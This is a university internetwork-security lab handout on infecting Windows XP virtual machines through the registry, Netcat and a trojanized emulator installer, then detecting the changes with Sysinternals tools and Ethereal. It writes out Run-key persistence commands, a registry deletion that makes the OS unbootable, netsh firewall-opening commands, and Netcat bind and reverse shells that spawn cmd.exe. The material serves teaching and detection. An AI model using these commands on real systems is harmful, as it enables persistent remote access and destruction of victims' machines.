ECE 4112 Internetwork SecurityLab: System Monitoring with Sys-Internals and C script

infection

Created by Jason Orlosky, Phillip Michael, and Todd Lyon

Date Assigned: Date Due: Last Edited:

Please read the entire lab and any extra materials carefully before starting. Be sure to start early enough so that you will have time to complete the lab. Answer ALL questions in the provided Answer Sheet and be sure you turn in ALL materials listed in the Turn-in Checklist on or before the Date Due.

Goal: This lab will help you understand how to infect a Windows system and then monitor the system to detect any changes with Sys-internals. It will also review infecting a system with c scripts.

Summary: In lab, you will be infecting machines in various ways. First you will infect the registry manually and then monitor to see what changes have been made. You will also learn how to disable a Windows operating system by modifying the registry. Then you will investigate how a c script works and infects a system by opening ports.

Background: References on the registry and how it works can be found here:http://support.microsoft.com/default.aspx?scid=kb;en-us;256986

Prelab Questions: None

Lab Scenario: None

Section 1: Registry Manipulation and Having evil fun

Intro / Background

In this part of the lab, you will be manipulating the windows registry. The windows registry is a part of windows that contains information about all programs on the windows system as well as vital system information. The registry can be used to configure programs, drivers, and system settings by modifying its keys. The registry is also important for startup of the system since it has replaced files such as .ini files, autoexec.bat, and Config.sys from previous operating systems. You will be creating another copy of WindowsXP in Vmware to infect. You will see how to create registry keys to keep a virus alive on a system and how to disable the system’s OS by deleting essential registry keys. We will also see how to detect registry modifications and prevent their improper use. The tools we will be using in lab are Regedit, the Sys-internal, RegMon, registry editing commands, batch files, and the Jetico Firewall.

Note that the methods of infection we will be reviewing are for after a virus has been put on a host system. Many of the new viruses and spyware today use the Windows Registry as a starting point for re-infection.

Modifying Registry Keys

Here are several commands that can be used in a command prompt or via software to modify the registry:

1) Adding a key:REG ADD RegistryPath /V Name /d Data

2) Modifying an existing key:REG UPDATE RegistryPath /V Name /d Data

3) Deleting a key: REG DELETE RegistryPath [/FORCE]

Additional commands for modifying or searching the registry can be found in appendix B. Type “reg” in the command line for a list of commands in the registry editor. Typing a specific command and then “/?” will give you parameters and examples of how to use that command.

Instead of having to type various commands on the command line, we can make use of windows batch files. This will also enable us to modify keys without actually having to open a command window. A coder can create .exe files to have the same functionality, but for this part of the lab, batch files will serve our purpose. The syntax of a batch file will be explained in the sections describing methods of infection.

First we need to create a new virtual copy of windows since we will eventually make the OS unbootable through the registry. Refer to Appendix C on how to make a copy of your WindowsXP virtual machine.

After you have made a copy, boot it and proceed.

Sample Registry Modification:

The first section of the registry we will infect is the location of windows startup items. To begin, we will take a look at what the registry looks like in a hierarchal file folder format. Each of these folders that contains registry values is called a hive.

1) Click Start -> Run and in the text field, type regedit and then enter.- This program can be used on any Windows Machine to modify registry keys in a GUI format.

You should see the following window on your screen after hitting enter:

2) Navigate to the following location in the gui by expanding the corresponding hives.

- HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

Here you should see several programs which will start up with the operating system after booting. Keys can be added to this location to start programs.

3) Add the following key to the registry via the command line.REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run (on same line) /v CMDstarter /d “C:\WINDOWS\SYSTEM32\cmd.exe”

/v specifies the value of the key and /d specifies the data

After adding the key via the command line, refresh the contents of the \Run hive by clicking on another folder in the registry and then back to the \Run hive.

Q1.1 List the keys you see in the registry including the key you just added. Be sure to show the names and data of each key.

Remove the new CMDstarter key from the registry using RegEdit. Just right click on the specified key and click delete. Click ok when asked if you are sure if you want to delete the file.

Keeping a Virus Alive on a System:

To show how adding registry keys in this location is useful, we have written a batch file that installs a virus. The batch file, once on the system, will install and run the virus from a separate file. Generally, a user can detect if a virus is running by running the task manager and checking for malicious looking programs. We can disguise the installation file as a different file which will only run for a few seconds to install and run the virus. This way, an untrained administrator will be unable to tell why the virus is re-infecting the system.

1) Download the following files and folders from the NAS server onto your WindowsXP virtual machine.

- HiddenFolder: Contains Infect.bat and RenameMe.exe- Regmon.exe

2) Run the Infect.bat file by double clicking it. - This is the file that will actually infect the system. It should only run for a fraction of a

second before the viral code executes. - Start the task manager by right clicking on the start bar and clicking ‘Task Manager.’

This can also be done by using ctl+alt+del. - Notice the MrMalicious.exe process that is running in the task manager. Ignore the

inner workings of MrMalicious for now. - This is primarily to show simply that the Infect.bat file will add a registry key to install

and run the MrMalicious program. A hacker could add code to MrMalicious to harm a system. The MrMalicious.exe we have written simply takes up CPU time.

3) Open regedit again and navigate to the same \Run folder we edited before. Notice how the Infect.bat file has been added as a registry key.

4) Click Start -> My Computer- Navigate to C:\Windows- Find the exe file called MrMalicious and delete it

5) Restart the WindowsXP virtual machine. The MrMalicious process should now be running just after startup. Notice that startup takes longer since the

MrMalicious program is taking up CPU time.

6) Edit your Infect.bat file by right clicking and selecting edit from the menu. Review the code in the batch file to answer the following question.

Q1.2 Explain how the Infect.bat file infects the system so that the viral process “MrMalicious.exe” continues to be present even after it is deleted and the system is restarted. Use Appendix A and B as references if necessary.

Attachment # 17) Create a batch file using the commands in Appendix A and B to remove the key in the following folder and add a new key with your Name as the Name and no data. HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet AudioFeel free to use existing batch files as a reference. Attach the code for this batch file to the end of your lab.

Disabling antivirus and firewall programs with the registry

1) The registry can easily be used to disable programs that start up with the computer. -Download the Jetico Firewall (Jpfwall.exe) from the NAS server and install it by double clicking on the exe file. - Choose all the default options for installation but do NOT restart when prompted after the installation process.

This installation will demonstrate how standard programs assert themselves on a system and start up.

2) Navigate to the \Run folder and notice that the firewall has inserted a key that will start it after the system boots. In order to remove it without manually using the registry editor a very simple scheme can be used to prevent anything from starting up on the host system.

- Windows will restore several of the basic keys in the \Run folder by default to start certain services such as quicktime. A hacker could remove all of the keys in the \Run folder on his or her system and then export that key into a backup file. Registry backup files can be double-clicked and will re-insert themselves into the registry, replacing old keys of the same title. Running the backup of a blank run folder would replace all the startup items with nothing.

3) Remove this registry key with Regedit and uninstall the firewall through the Control Panel -> Add/Remove programs.

Q1.3 How would someone remove solely the firewall key without knowing its title? Describe what a hacker’s software would have to do in order to prevent a specific program from starting up such as Norton Antivirus or ZoneAlarm Firewall. (Hint: The query command would be useful)

Section 2: Detecting Registry Modification and Removing malicious keys:

We will use the Sys-internal RegMon to monitor our system’s registry accesses and modifications. RegMon is an excellent tool since it shows all registry accesses with time, process, path, and data. These attributes will be extremely valuable in determining which keys have been added by a viral program.

1) Download the RegMon tool from the NAS and run it.

- The tool will immediately begin capturing registry entries. Most of these entries are valid entry accesses by windows programs. In order to detect invalid or malicious registry keys, we need to begin filtering the valid registry keys, so only malicious ones will be logged.

2) After about 20 seconds of capturing, click file and uncheck ‘capture events.’

- You should now have several hundred entries with which to start filtering. - The easiest way to begin filtering is with process names.

3) Click options -> filter/highlight and the following window will appear. Enter some of the names of processes such as “Explorer; svchost; winlogon” to exclude from the display. Filter options are separated by commas. Begin filtering again by re-checking the ‘capture events’ option.

Keep adding to the filter string while registry reads and writes are occurring. You will see that fewer and fewer reads and writes show up on the list.

4) Once most of the very commonly occurring processes have been filtered out, run the Infect.bat file used in the beginning of the lab.

Screenshot #1Search through the registry accesses and locate the malicious key. Highlight the key in the RegMon and take a screenshot. Include this with your lab for turn-in.

The easiest way to delete this maliciously added key is to use Regedit and navigate to the key’s hive. Do this now and delete the key using delete from the right click menu.

Disabling the Operating system by deleting essential keys:

Note: This part of the lab is EXTREMELY malicious, do not do this to your friends!!!!!

Unfortunately for Microsoft, the registry is an essential point of operation for windows. It carries information about all windows processes. Some of these processes require registry keys in order to run. We will disable the operating system by removing several essential folders in the regisrty.

1) Start regedit. 2) Delete the following key, click ok if an error is generated and reboot the VM. - HKEY_LOCAL_MACHINE\SOFTWARE

This could also be accomplished by typing the following in the command line.REG DELETE HKEY_LOCAL_MACHINE\SOFTWARE

Restarting the system will not work. This is extremely effective because the system will not even start in safe mode!!! A user or admin must repair or re-install the operating system from external bootable media.

Screenshot #2Take a screenshot of the failed system and attach it to your lab report. On the screenshot, describe what happened upon reboot.

In order to prevent this from happening, a user should back up the whole registry on a separate disk. Users can back up the registry by exporting major keys via regedit. He or she could boot from a Windows CD and re-insert the keys into the registry from the backup file, keeping information about current programs. If the user did not have these backups, he or she would be forced to repair or re-install the operating system. Neither repairing nor re-installing would recover data from programs that are not on the Windows CD such as AOL Instant Messenger or Microsoft Office.

Q2.4 Why is it that not many hackers have used the registry to disable operating systems?

Section 3: Making use of the Windows registry and other command line options to exploit Windows.

In this section of the lab, we will be implementing basic C programming along with the Netcat tool to exploit the Windows XP registry and the Windows XP firewall, so that root access to a Windows XP machine, with SP 2 installed, can be gained. For this section of the lab, a new Windows XP virtual machine with SP2 installed will need to be created. In order to do this please follow the instructions from “LAB 1: OS Installation and Introduction to Security Tools” on creating a Virtual Machine, you will need to make sure an Image of Windows XP with SP2 is available on the NAS or from the TA. We will also be using our RedHat 7.2 virtual machine as the attacker, please make sure Netcat is installed on this virtual machine as well. Information on installing Netcat for both the Windows XP and RedHat 7.2 virtual machines can be found in “LAB 6: Backdoors and Trojans”, a copy of this information is also provided in Appendix D, along with descriptions of the basic functions of Netcat. To begin with please make sure to install Netcat in a new directory called C:\nc11nt on the Windows XP machine (Netcat should already be installed on the RedHat 7.2 machine, if not follow the instructions in

Appendix D), and turn on both the RedHat 7.2 (i.p. 57.35.6.x+1), and Windows XP (i.p. 57.35.6.x+3) Virtual Machines.

Refamiliarizing Ourselves with Netcat and the Windows XP firewall

Before we review some basic Netcat commands, make sure the Windows XP firewall is enabled in your Windows XP virtual Machine. To do this, go to the control panel, and then access the option called “Windows Firewall”. Make sure that under the general tab, the firewall is set to “ON”, but that the “Don’t allow exceptions” box is not checked. Next take just a few moments to review the Netcat parameters in appendix D.

At this point before continuing with the lab, take a snapshot of the Windows XP SP2 virtual machine. We will be reverting back to this snapshot later in this section of the lab.The options to do this should be at the top of the virtual machine. If for some reason, you are in a view in which you are unable to access this option, ask a TA for assistance.

Now on the Windows XP machine go to Start -> Run, and type “cmd”. Next go to the C:\nc11nt directory by typing cd\nc11nt. While in the Netcat directory type “nc –L –p 8633 -e cmd.exe”. After running this command, you should see a windows security alert. This is because the firewall by default is set to not allow incoming traffic on port 8633, and Netcat is in listen mode expecting a connection on this port.

Screenshot #3Take a screenshot of the Windows Security Alert asking if you want to keep blocking the nc program.

Now choose to “Keep Blocking the port”. The Netcat program is still trying to listen on the port. On your 8.0 Machine open up ethereal, and start packet capture in promiscuous mode. Switch to your RedHat 7.2 machine, and from the terminal try the command “nc 57.35.6.x+3 59”. Now stop capture in ethereal and view the packets.

Q3.1 What does ethereal show transpired between the 7.2 and Windows XP machines? Why did this occur?

Hit control-C on both the Windows XP and RedHat 7.2 command lines. Now from the 7.2 command line run nmap against the Windows machine (“nmap 57.35.6.x+3”). Pick a port listed is open and now run the command from the Windows command line “nc –L –p “open_port” –e cmd.exe”. Notice that no Windows Security Alert pops up. Now from the 7.2 machine run nc 57.35.6.x+3 “open_port”. Notice this still doesn’t work. Even using Netcat’s –s option (see man nc in 7.2 for more information on the –s option) and binding a port picked up by nmap does not allow the 7.2 machine to connect. So now what?

From the Windows command line, type in the command “netsh firewall show portopening”.

Q3.2 What does this command show?

If there are any additional ports (ones not found from the port scan), they may be able to be used to gain access on with Netcat. To do this you can try to run “nc –L –p “additional_port” –e cmd.exe” from the Windows machine, and then nc 57.35.6.x+3 “additional_port” from the 7.2 machine. However to be safe, or rather to avoid any further Windows Security Alerts, it is better to just go ahead and set up the firewall to accept traffic to Netcat on a certain port. To start with, from the windows command line, type “netsh firewall” to view a list of commands available when editing or viewing the firewall. Now type “netsh firewall add”, doing this gives you possible parameters for the add command. As you can see by playing around with the various commands, many options are available to you, and the Windows XP firewall for SP2 can be manipulated however you choose.

When looking at the firewall options from the control panel earlier, you may remember the box that could be checked to not allow exceptions. In order to turn this off, all you have to do is type “netsh firewall reset” and the Windows XP firewall is reset to it’s default state, which is set to allow exceptions. This a huge insecurity in the firewall.

In our case we want to poke a hole through this firewall to allow access to the Windows XP machine via Netcat. To do this we will use the command:

“netsh firewall add portopening protocol = ALL port = 8633 name = nc mode = ENABLE scope = ALL profile = ALL”

Entering this one command from the Windows XP command line allows an opening in the firewall specifically for Netcat (nc.exe) on port 8633 for both TCP and UDP protocols, and for all users if executed with administrator access.

After entering this command, let’s retry our original attempt to gain access to the Windows machine. From the Windows XP command prompt, type “nc –L –p 8633 –e cmd.exe”. Now from the 7.2 machine, type “nc 57.35.6.x+3 8633”. SUCCESS!!! Notice that as soon as you close the command window in windows, you lose connection on the 7.2 machine. In order to avoid this, From the Windows XP command prompt, type “nc –L –p 8633 –e cmd.exe –d”. Now close the command window, and attempt to connect again. The –d option allows Netcat to run silent. If you hit ctrl-alt-del in windows you can find nc.exe in the process manager. Using Knowledge of Netcat, The Windows Registry, The Windows Firewall, and basic C programming to write an exploit

At this point use the revert option on the top of the Windows XP SP2 virtual machine to revert Windows back to the state found towards the beginning of this section. This is done in order to restore the Windows XP firewall.

At this point in the lab, let us pretend we are a hacker with not so pleasant intentions operating from the RedHat 7.2 machine. The Windows XP machine is being operated by either a Co-worker, schoolmate, roommate, or anyone you can think of that would be found on the same network as you (i.e. no router is separating you). On the Windows XP machine, download the ZSNES.zip file from the NAS and put it on the Windows XP machine in a new folder. This file is a self extracting zip that installs the ZSNES Super Nintendo Emulator (a freeware SNES emulator for the PC). In addition to installing the emulator this self extracting zip also installs Netcat, and executes another program called installer.exe (also known as Trojan 8633 – 8633 being the numeric representation of TODD [for Todd Lyon the author of this exploit, and for that matter the author for this section of this lab].

Thinking he is in for an exciting afternoon of playing Super Mario World, and possibly even a little Ogre Battle, our unsuspecting Windows XP user is more than happy to take and install the emulator you give him. After he installs it, you have administrative access to his machine, for as long is you are on the same network with him (assuming he is not extremely knowledgeable of his Registry, or Firewall, or doesn’t decide to format his hard drive).

At this point, run the self extracting ZSNES.zip file. You will notice a couple OK’s popping up in a command prompt, and then you will be in a folder with the newly installed ZSNES emulator.

From the RedHat 7.2 machine, type “nc 57.35.6.x+3 8633”. After this you will be in the Windows XP machines command prompt. Now, power off the Windows machine, and restart it.

Q3.3 What happens when you restart the Windows XP machine, and try to connect from the RedHat 7.2 machine with Netcat?

For Netcat to still be running in listen mode after rebooting the computer, the registry had to have been altered by the installer.exe file. But How?

The Windows XP registry has six registry keys designated for launching programs when starting up the computer. They are:

HKCU\Software\Microsoft\Windows\CurrentVersion\Run- Launches program when specific user logs in

HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce- Launches program when specific user logs in next time, then is removed from the

registry

HKLM\Software\Microsoft\Windows\CurrentVersion\Run- Launches program automatically at system startup

HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce- Launches program automatically at system startup on next startup, then is

Removed from the registry.

HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices- Launches service automatically at system startup (e.g. AIM)

HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce- Launches service automatically at system startup on next startup, then is

Removed from the registry.

At this time download the files installer.c, and server.c and view the code used for this attack. Looking in the installer.c file, we can see that the entire program is made up of system calls.

Looking at the seventh system call, the command “reg add hklm\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v update /t REG_SZ /d c:\windows\system32\server.exe /f” is run. This command adds to the HKLM\Software\Microsoft\Windows\CurrentVersion\Run key, which launches programs automatically at system startup. The server.exe file is the file run when the machine is started. Looking at the server.c file, you can see that all it does is run the “nc –L –p 8633 –e cmd.exe –d” command.

From the exploited Windows machine, bring up a command prompt and run the command regedit.

Screenshot #4

Take a screenshot of the the entry running server.exe highlighted in the registry editor

Modifying The 8633 Exploit to Access a Machine outside of our Network

Using the same concept of giving the self extracting zip to some unsuspecting Windows XP user, we want to find a way to access their machine if we are on a separate network from them. In order to do this, we have to find a way to talk to their machine without the router dropping all the packets we are trying to send them. The easiest way to do this, is to have their machine Syn our machine. This way they initiate the connection. If we simply change the eighth system call of installer.c from “ nc –L –p 8633 –e cmd.exe –d” to “ nc “your_ip” 8633 –e cmd.exe –d” and have our machine waiting in listen mode on port 8633, as long as no firewall is blocking our port 8633, we will have a shell to their command prompt.

Because we are using exe files when attacking Windows system, the installer.c file needs to be compiled in Windows. Fortunately the Microsoft C/C++ Optimizing Compiler and Linker are freely available. The Compiler can be found at http://msdn.microsoft.com/visualc/vctoolkit2003/. Microsoft’s linker is available at http://www.microsoft.com/whdc/devtools/debugging/installx86.mspx.

However for the purpose of this lab, the compiler and debugger can both be found on the NAS. After installing these tools, to compile the new code we use the command “cl /Zi /MLd /Fe installer2.c”. In order to create a self extracting zip, Zip 2 secure was used (attained at “www.download.com”).

Q3.4 How can you detect malicious code such as the 8633 program running on your computer?

Q3.5 What should you do avoid having malicious code such as this installed on your machine in the first place?

Section 4: More monitoring with Sys-internals

In this part of the lab you will be monitor your system as a virus is unleashed. To monitor the virus we will be using 4 utilities from http://sysinternals.com and ethereal. These utilities will log Registry Accesses(Regmon), File Accesses(FileMon), Network Accesses(TDIMon), Network Traffic(ethereal) and view Live Process Information(Process Explorer).

Task Guide1. Install Winpcap and for the network share.

2. Copy the sysinternals folder to your desktop3. Start Ethereal Capturing packets4. Open the sysinternals folder

a. Start Regmon located in the ntregmon folderb. Start Filemon located in the ntfilemon folderc. Start TDIMon located in the tdimonnt folderd. Start Process Explorer located in the procexnt folder

5. Execute the virus (document.pif)6. Switch to Process Explorer

a. In Process Explorer find the virusQ 4.1 - What is the name of the virus process loaded in memory?

b. Right click on the virus process & select propertiesi. then select the TCP/IP tab

Q 4.2 - Is this process running a server?Q 4.3 - If yes, What port is it listening on?

ii. Close the properties windows7. Let’s find out what service is running on port you just discovered

a. Open a command prompt(Start->Run “cmd”)i. Telnet to the port

ex. “telnet 127.0.0.1 21” if the port is 21Q 4.4 - What type of server does this appear to be?

ii. Next try ftping to the portex. “ftp (enter) o 127.0.0.1 21”Q 4.5 - Do you receive a login prompt?

iii. If so try login1. logout by typing “bye”

S 4.1 - Take a screen capture of your ftp session.b. Right click on the virus process, select kill process.& close the Process

Explorer8. Switch to Ethereal

a. Stop the captureb. Q 4.6 - What port number do you see a large number of connections

to?Help: try using this filter ”tcp.flags == 2”

c. Q 4.7 - Why do you think this is?d. Since your not on a live internet connection open the virus3.pcap file

This file is a capture of the same virus on a live internet connection.i. Q 4.8 - What port are connections extablished to?

Help: try using this filter ”tcp.flags == 0x12” right click and follow the some of the TCP Stream

ii. Q 4.9 - What is it connecting to these 2 different ports for?9. Switch to the Registry Monitor

a. Q 4.10 - What is the virus repeatively doing to the registry, and why do you think this is?

b. S 4.2 Take a screen capture of this10. Switch to the Filemon

a. Use filemon to find the answers to the following questionsi. Q 4.11 - What is the name and path of the executable created

once document.pif is executed?ii. Q 4.12 - There are 3 files created to replicate the virus on the

hard drive where are they and what are there names?iii. Q 4.13 - Why do you think the virus searches for files on the

hard drive?Hint: It has to do with the traffic going to port 25

11. Switch to TDIMONa. The virus is trying to make open allot of connections to hosts

i. Q 4.14 - What port is it trying to connect to and why?ii. S 4.3 - Take a screen capture of this

12. Remove the virus (or remove the VMWare Image)a. Execute FixMytob.exe

Q 4.15 - What is the an advantage of active logging over active monitoring?

Questions

Q1.1 List the keys you see in the registry including the key you just added. Be sure to show the names and data of each key.

Screenshot #1Take a screenshot of the failed system and attach it to your lab report.

Q1.2 Explain how the Infect.bat file infects the system so that the viral process “MrMalicious.exe” continues to be present even after it is deleted and the system is restarted. Use Appendix A and B as references if necessary.

Attachment # 1Create a batch file using the commands in Appendix A and B to remove the key in the following folder and add a new key with your Name as the Name and no data. HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet AudioFeel free to use existing batch files as a reference. Attach the code for this batch file to the end of your lab.

Q1.3 How would someone remove solely the firewall key without knowing its title? Describe what a hacker’s software would have to do in order to prevent a specific program from starting up such as Norton Antivirus or ZoneAlarm Firewall. (Hint: The query command would be useful)

Screenshot #2Search through the registry accesses and locate the malicious key. Highlight the key in the RegMon and take a screenshot. Include this with your lab for turn-in.

Q2.4 Why is it that not many hackers have used the registry to disable operating systems?

Screenshot #3Take a screenshot of the failed system and attach it to your lab report. On the screenshot, describe what happened upon reboot.

Screenshot #4Take a screenshot of the Windows Security Alert asking if you want to keep blocking the nc program.

Q3.5 What does ethereal show transpired between the 7.2 and Windows XP machines? Why did this occur?

Q3.6 What does this command show?

Q3.7 What happens when you restart the Windows XP machine, and try to connect from the RedHat 7.2 machine with Netcat?

Screenshot #5Take a screenshot of the the entry running server.exe highlighted in the registry editor

Q3.8 How can you detect malicious code such as the 8633 program running on your computer?

Q3.9 What should you do avoid having malicious code such as this installed on your machine in the first place?

Turn-in ChecklistTurn in the:- Answer sheet - Screenshots 1-5- Comments and Additions

Appendix A: Registry Commands via Windows command line

Console Registry Tool for Windows - version 3.0Copyright (C) Microsoft Corp. 1981-2001. All rights reserved

REG Operation [Parameter List]

Operation [ QUERY | ADD | DELETE | COPY | SAVE | LOAD | UNLOAD | RESTORE | COMPARE | EXPORT | IMPORT ]

For help on a specific operation type:

REG Operation /?

Examples:

REG QUERY /? REG ADD /? REG DELETE /? REG COPY /? REG SAVE /? REG RESTORE /? REG LOAD /? REG UNLOAD /? REG COMPARE /? REG EXPORT /? REG IMPORT /?

Registry Add example parameters

REG ADD KeyName [/v ValueName | /ve] [/t Type] [/s Separator] [/d Data] [/f]

KeyName [\\Machine\]FullKey Machine Name of remote machine - omitting defaults to the current machine Only HKLM and HKU are available on remote machines FullKey ROOTKEY\SubKey ROOTKEY [ HKLM | HKCU | HKCR | HKU | HKCC ] SubKey The full name of a registry key under the selected ROOTKEY

/v The value name, under the selected Key, to add

/ve adds an empty value name <no name> for the key

/t RegKey data types [ REG_SZ | REG_MULTI_SZ | REG_DWORD_BIG_ENDIAN | REG_DWORD | REG_BINARY | REG_DWORD_LITTLE_ENDIAN | REG_NONE | REG_EXPAND_SZ ] If omitted, REG_SZ is assumed

/s Specify one charactor that you use as the separator in your data string for REG_MULTI_SZ. If omitted, use "\0" as the separator

/d The data to assign to the registry ValueName being added

/f Force overwriting the existing registry entry without prompt

Examples:

REG ADD \\ABC\HKLM\Software\MyCo Adds a key HKLM\Software\MyCo on remote machine ABC

REG ADD HKLM\Software\MyCo /v Data /t REG_BINARY /d fe340ead Adds a value (name: Data, type: REG_BINARY, data: fe340ead)

REG ADD HKLM\Software\MyCo /v MRU /t REG_MULTI_SZ /d fax\0mail Adds a value (name: MRU, type: REG_MUTLI_SZ, data: fax\0mail\0\0)

REG ADD HKLM\Software\MyCo /v Path /t REG_EXPAND_SZ /d %%systemroot%% Adds a value (name: Path, type: REG_EXPAND_SZ, data: %systemroot%) Notice: Use the double percentage ( %% ) inside the expand string

C:\Documents and Settings\default>

Appendix B: Commands for batch files via the Windows command line. The following was referenced from: http://www.ss64.com/nt/More detailed explanations can be found there as well. Note: Some of these commands are version dependent.

An A-Z Index of the Windows NT/XP command line

ADDUSERS Add or list users to/from a CSV fileARP Address Resolution ProtocolASSOC Change file extension associationsASSOCIAT One step file associationAT Schedule a command to run at a later timeATTRIB Change file attributesBROWSTAT Get domain, browser and PDC infoCACLS Change file permissionsCALL Call one batch program from anotherCD Change Directory - move to a specific FolderCHANGE Change Terminal Server Session propertiesCHKDSK Check Disk - check and repair disk problemsCHKNTFS Check the NTFS file systemCHOICE Accept keyboard input to a batch fileCIPHER Encrypt or Decrypt files/foldersCleanMgr Automated cleanup of Temp files, recycle binCLEARMEM Clear memory leaksCLIP Copy STDIN to the Windows clipboard.CLS Clear the screenCLUSTER Windows ClusteringCMD Start a new CMD shellCOLOR Change colours of the CMD windowCOMP Compare the contents of two files or sets of filesCOMPACT Compress files or folders on an NTFS partitionCOMPRESS Compress individual files on an NTFS partitionCON2PRT Connect or disconnect a PrinterCONVERT Convert a FAT drive to NTFS.COPY Copy one or more files to another locationCSVDE Import or Export Active Directory data DATE Display or set the dateDcomcnfg DCOM Configuration UtilityDEFRAG Defragment hard driveDEL Delete one or more filesDELPROF Delete NT user profilesDELTREE Delete a folder and all subfoldersDevCon Device Manager Command Line Utility DIR Display a list of files and foldersDIRUSE Display disk usageDISKCOMP Compare the contents of two floppy disksDISKCOPY Copy the contents of one floppy disk to anotherDNSSTAT DNS StatisticsDOSKEY Edit command line, recall commands, and create macrosDSADD Add user (computer, group..) to active directoryDSQUERY List items in active directoryDSMOD Modify user (computer, group..) in active directoryECHO Display message on screen

ENDLOCAL End localisation of environment changes in a batch fileERASE Delete one or more filesEXIT Quit the CMD shellEXPAND Uncompress filesEXTRACT Uncompress CAB filesFC Compare two filesFDISK Disk Format and partitionFIND Search for a text string in a fileFINDSTR Search for strings in filesFOR Conditionally perform a command several timesFORFILES Batch process multiple filesFORMAT Format a diskFREEDISK Check free disk space (in bytes)FSUTIL File and Volume utilitiesFTP File Transfer ProtocolFTYPE Display or modify file types used in file extension associationsGLOBAL Display membership of global groupsGOTO Direct a batch program to jump to a labelled lineHELP Online HelpHFNETCHK Network Security Hotfix Checker IF Conditionally perform a commandIFMEMBER Is the current user in an NT WorkgroupINSTSRV Install an NT ServiceIPCONFIG Configure IPKILL Remove a program from memoryLABEL Edit a disk labelLOCAL Display membership of local groupsLOGEVENT Write text to the NT event viewer.LOGOFF Log a user offLOGTIME Log the date and time in a fileMAPISEND Send email from the command lineMEM Display memory usageMD Create new foldersMODE Configure a system deviceMORE Display output, one screen at a timeMOUNTVOL Manage a volume mount pointMOVE Move files from one folder to anotherMOVEUSER Move a user from one domain to anotherMSG Send a messageMSIEXEC Microsoft Windows InstallerMSINFO Windows NT diagnosticsMUNGE Find and Replace text within file(s)MV Copy in-use filesNET Manage network resourcesNETDOM Domain ManagerNETSH Configure network protocolsNETSVC Command-line Service ControllerNBTSTAT Display networking statistics (NetBIOS over TCP/IP)NETSTAT Display networking statistics (TCP/IP)NOW Display the current Date and Time NSLOOKUP Name server lookupNTBACKUP Backup folders to tapeNTRIGHTS Edit NT user account rightsPATH Display or set a search path for executable filesPATHPING IP trace utilityPAUSE Suspend processing of a batch file and display a message

PERMS Show permissions for a userPERFMON Performance MonitorPING Test a network connectionPOPD Restore the previous value of the current directory saved by PUSHDPORTQRY Display the status of ports and servicesPRINT Print a text filePRNCNFG Display, configure or rename a printerPRNMNGR Add, delete, list printers set the default printerPROMPT Change the command promptPUSHD Save and then change the current directoryQGREP Search file(s) for lines that match a given pattern.RASDIAL Manage RAS connectionsRASPHONE Manage RAS connectionsRECOVER Recover a damaged file from a defective disk.REG Read, Set or Delete registry keys and valuesREGEDIT Import or export registry settingsREGSVR32 Register or unregister a DLLREGINI Change Registry PermissionsREM Record comments (remarks) in a batch fileREN Rename a file or files.REPLACE Replace or update one file with anotherRD Delete folder(s)RDISK Create a Recovery DiskRMTSHARE Share a folder or a printerROBOCOPY Robust File and Folder CopyROUTE Manipulate network routing tablesRUNAS Execute a program under a different user accountRUNDLL32 Run a DLL command (add/remove print connections)SC Service ControlSCLIST Display NT ServicesScriptIt Control GUI applicationsSET Display, set, or remove Windows NT environment variablesSETLOCAL Begin localisation of environment changes in a batch fileSETX Set environment variables permanently SHARE List or edit a file share or print shareSHIFT Shift the position of replaceable parameters in a batch fileSHORTCUT Create a windows shortcut (.LNK file)SHOWGRPS List the NT Workgroups a user is inSHOWMBRS List the members of an NT WorkgroupSHUTDOWN Shutdown the computerSHUTGUI Shutdown the computerSLEEP Wait for x secondsSOON Schedule a command to run in the near futureSORT Sort inputSTART Start a separate window to run a specified program or commandSU Switch UserSUBINACL Edit file and folder Permissions, Ownership and DomainSUBST Associate a path with a drive letterTASKLIST List running applications and servicesTIME Display or set the system timeTIMEOUT Delay processing of a batch fileTITLE Set the window title for a CMD.EXE sessionTOUCH Change file timestamps TRACERT Trace route to a remote hostTREE Graphical display of folder structureTYPE Display the contents of a text file

USRSTAT List domain usernames and last loginVER Display version informationVERIFY Verify that files have been savedVOL Display a disk labelWHERE Locate and display files in a directory treeWHOAMI Output the current UserName and domainWINMSD Windows NT DiagnosticsWINMSDP Windows NT Diagnostics IIWMIC WMI CommandXCACLS Change file permissionsXCOPY Copy files and folders

Appendix C – Making a copy of a virtual machine

Follow these directions to set up your second virtual machine:

On your RedHat 8.0 Host, in the root directory make a new directory called WinXPProCopy

# cd /root# mkdir winXPProCopy

Copy all files from WinXPPro directory into this new directory

# cp winXPPro/* winXPProCopy/

This will take a while to complete.

Now to set up the new virtual machine:Start up VMWare, and go to File -> New - > New Virtual Machine. Choose Custom and click Next.Select the operating system as Windows XP ProfessionalChange the name of the new machine to winXPProCopy and change the directory to /root/winXPProCopy. Click NextAdjust the virtual memory so that you can run all three machines at the same time. Bring it downto 128mb for now.Select Bridged networking and click Next.Choose “Use an existing virtual disk” and click Next.Click Browse and choose the file called winXPPro.vmdk in the new directory.Click Finish.This will create a new virtual machine on your host system.You will need to change the ip address of the new WinXP virtual machine. Change it to the oldWinXP machine address + 1. For example, if it was w.x.y.z of the original XP machine, changeit to w.x.y.z+1. To do this:Start the new virtual machine. Click Start -> Control PanelNetwork and Internet ConnectionsNetwork ConnectionsRight Click on local area connectionsPropertiesSelect TCP/IPPropertiesMake your changes and click OK

Appendix D – Installation and use of Netcat

EXCERPTS FROM LAB 6: BACKDOORS AND TROJANS

Installing Netcat on the Windows machineStart your main Windows machine (XP 1) and copy the \\57.35.10.10\secure_class\Tools\Windows directory to your computer. Unzip the nc11nt.zip program and it should automatically create a directory called nc11nt. Now, whenever you want to run Netcat, you will have to go into this folder and run it from there (unless you add this directory to the path). Now install Netcat on the other XP machine too (XP2).

Installing Netcat on the Linux machineYou should already have a file called netcat.tar.gz in your /home/tools directory. If you don’t, get it from /mnt/nas4112/Tools/Linux/, after mounting the NAS server. Go into your /home/tools directory and execute the following commands:

#tar xvfz netcat.tar.gz#cd netcat#make linux#cp nc /usr/local/sbin

